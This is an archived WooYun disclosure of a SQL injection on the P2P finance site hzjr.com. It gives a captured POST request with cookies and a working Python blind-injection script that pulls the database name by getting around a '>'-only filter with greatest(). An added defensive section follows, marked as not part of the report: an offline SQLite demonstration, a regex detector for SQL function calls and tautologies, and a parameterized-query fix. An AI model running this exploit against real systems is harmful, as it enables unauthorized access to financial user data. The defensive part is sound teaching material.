WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles, online reader --------------- http://drop.zone.ci/
2015-09-16: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly.
2015-10-31: The vendor has chosen to ignore the vulnerability; details are disclosed to the public.
P2P investment and wealth-management security: the Huizhong Finance (hzjr.com) main site has a SQL injection that bypasses WAF protection
https://www.hzjr.com/
POST /crowd/order.html HTTP/1.1
Content-Length: 110
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://www.hzjr.com:443/
Cookie: PHPSESSID=i5cnja8cm3d9v5qkcee6ol3m96; nbKK_2132_saltkey=s6lXWx52; nbKK_2132_lastvisit=1442328642; nbKK_2132_sid=LbxUR0; nbKK_2132_lastact=1442335018%09member.php%09logging; nbKK_2132_onlineusernum=10; back_url=http%3A%2F%2Fwww.hzjr.com%2Findex.php%2FHome%2FMember%2Flogin; nbKK_2132_home_readfeed=1442332247; nbKK_2132_home_diymode=1; nbKK_2132_st_t=0%7C1442332269%7C17674e81a4621395282e9ed46434a1cd; nbKK_2132_forum_lastvisit=D_46_1442332247D_65_1442332269; nbKK_2132_visitedfid=65D54D46; nbKK_2132_st_p=0%7C1442332269%7C17674e81a4621395282e9ed46434a1cd; nbKK_2132_viewid=tid_6616; nbKK_2132_sendmail=1; remember=4111111111111111; nbKK_2132__refer=%252Fbbs%252Fhome.php%253Fac%253Dpm%2526daterange%253D2%2526handlekey%253Dshowmsg_3994%2526mod%253Dspacecp%2526op%253Dshowmsg%2526pid%253D7182%2526pmid%253D0%2526tid%253D278%2526touid%253D3994; CNZZDATA5907335=cnzz_eid%3D303063732-1442328402-null%26ntime%3D1442328402; IESESSION=alive; pgv_pvi=9282741248; pgv_si=s2817908736; ykss=3f43f8551e18a76d22239b15; BAIDUID=2E61313B56FC00406F8893F316F92DF6:FG=1; nbKK_2132_atarget=1
Host: www.hzjr.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

age=20&cid=10&order_money=1&phone=555-666-0606&real_name=bebyjxpx&remark=1

The cid parameter is injectable, and the > character is filtered. When the injected condition is true, the database name length comes back as 8:
When it is false:
Attached script:
#encoding=utf-8
# Python 2 script as posted in the report, reformatted with its original indentation restored.
import httplib
import time
import string
import sys
import random
import urllib

headers = {'Content-Type': 'application/x-www-form-urlencoded'}
# Candidate characters for the database name, tried one position at a time
payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')
print 'start to retrieve DB:'
user = ''
for i in range(1, 9):  # the name length was already determined to be 8
    for payload in payloads:
        conn = httplib.HTTPConnection('www.hzjr.com', timeout=60)
        params = {
            'age': '20',
            'order_money': '1',
            # equality test wrapped in greatest() so that no ">" is needed
            'cid': "10 AND greatest(ascii(mid(lower(database()),%s,1)),1)=%s AND 860=860" % (i, ord(payload)),
            'phone': '555-666-0606',
            'real_name': 'bebyjxpx',
            'remark': '1',
        }
        conn.request(method='POST', url='/crowd/order.html', body=urllib.urlencode(params), headers=headers)
        resp = conn.getresponse()
        html_doc = resp.read().decode('utf-8')
        conn.close()
        #print html_doc
        print '.',
        # the page text below only appears when the injected condition is true
        if html_doc.find(u'众筹未开始或已结束') > 0:  # True
            user += payload
            print '\n[in progress]', user
            break
print '\nMysql DB is', user
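The following is an added defensive example and is not part of the WooYun report or the vendor's code. It reproduces the report's core point offline: a filter that only strips the > character does not stop a boolean-based blind injection, because the same equality test can be wrapped in greatest(). The in-memory SQLite table, the made-up schema name hzjr_db, the emulated MySQL functions, the request bodies and the function-name list for detection are all constructed assumptions; the example then shows a request-body check that looks for function calls and tautologies rather than single characters, and the parameterized-query fix with strict input typing.

```python
# Added defensive example, not from the WooYun report: why a ">"-only
# blacklist fails against the report's payload shape, how to detect it in
# request bodies, and the parameterized fix. All data below is constructed.
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed request bodies. The second has the same shape as the report's
# payload: an equality test wrapped in greatest(), so no ">" is needed.
BENIGN_BODY = "age=20&cid=10&order_money=1&phone=555-666-0606&real_name=alice&remark=1"
INJECTED_BODY = ("age=20&cid=10 AND greatest(ascii(mid(lower(database()),1,1)),1)=104 AND 860=860"
                 "&order_money=1&phone=555-666-0606&real_name=alice&remark=1")


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the application's MySQL database. The MySQL
    functions the payload relies on are emulated so the oracle behaves the
    same way; the schema name 'hzjr_db' is an assumption for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE crowd (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO crowd VALUES (10, 'sample project')")
    conn.create_function("greatest", 2, max)
    conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    conn.create_function("mid", 3, lambda s, pos, n: s[pos - 1:pos - 1 + n])
    conn.create_function("database", 0, lambda: "hzjr_db")
    return conn


def strip_gt_filter(value: str) -> str:
    """The kind of filter the report describes: only the '>' character is removed."""
    return value.replace(">", "")


def vulnerable_lookup(conn, cid: str) -> list:
    """String-concatenated query: whatever survives the filter runs as SQL, and
    the row count leaks whether the attacker's condition was true."""
    sql = "SELECT id, name FROM crowd WHERE id = " + strip_gt_filter(cid)
    return conn.execute(sql).fetchall()


def safe_lookup(conn, cid: str) -> list:
    """Parameterized query plus strict input typing: cid must be a decimal integer."""
    if not re.fullmatch(r"[0-9]{1,10}", cid):
        raise ValueError("cid must be a decimal integer")
    return conn.execute("SELECT id, name FROM crowd WHERE id = ?", (int(cid),)).fetchall()


# Detection: flag parameter values carrying SQL function calls or tautologies.
# The function-name list is a constructed starting point, not an exhaustive one.
SQL_FUNCS = r"\b(?:greatest|least|ascii|ord|mid|substr(?:ing)?|database|version|sleep|benchmark)\s*\("
TAUTOLOGY = r"\b(\d+)\s*=\s*\1\b"
PATTERN = re.compile(SQL_FUNCS + "|" + TAUTOLOGY, re.IGNORECASE)


def flag_suspicious_params(body: str) -> list:
    """Return the names of form parameters whose (URL-decoded) value matches a pattern."""
    flagged = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        if any(PATTERN.search(v) for v in values):
            flagged.append(name)
    return flagged


def demo() -> dict:
    """Run both lookups against the injected cid value and summarize the outcome."""
    conn = make_db()
    cid_true = parse_qs(INJECTED_BODY)["cid"][0]      # first char of 'hzjr_db' is 'h' (104)
    cid_false = cid_true.replace("=104", "=105")      # same query, wrong guess
    result = {
        "vuln_true_rows": len(vulnerable_lookup(conn, cid_true)),    # 1: condition leaks as true
        "vuln_false_rows": len(vulnerable_lookup(conn, cid_false)),  # 0: condition leaks as false
        "flagged": flag_suspicious_params(INJECTED_BODY),
        "benign_flagged": flag_suspicious_params(BENIGN_BODY),
    }
    try:
        safe_lookup(conn, cid_true)
        result["safe_rejected"] = False
    except ValueError:
        result["safe_rejected"] = True
    return result


if __name__ == "__main__":
    print(demo())
```

The vulnerable lookup returns one row for the correct guess and none for the wrong one even though the > filter ran, which is exactly the oracle the report's script reads; the parameterized lookup rejects the value before it reaches the database, and the body check catches the payload shape independently of which comparison operator it uses.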
Unable to contact the vendor, or the vendor actively refused.
Vulnerability Rank: 15 (WooYun rating)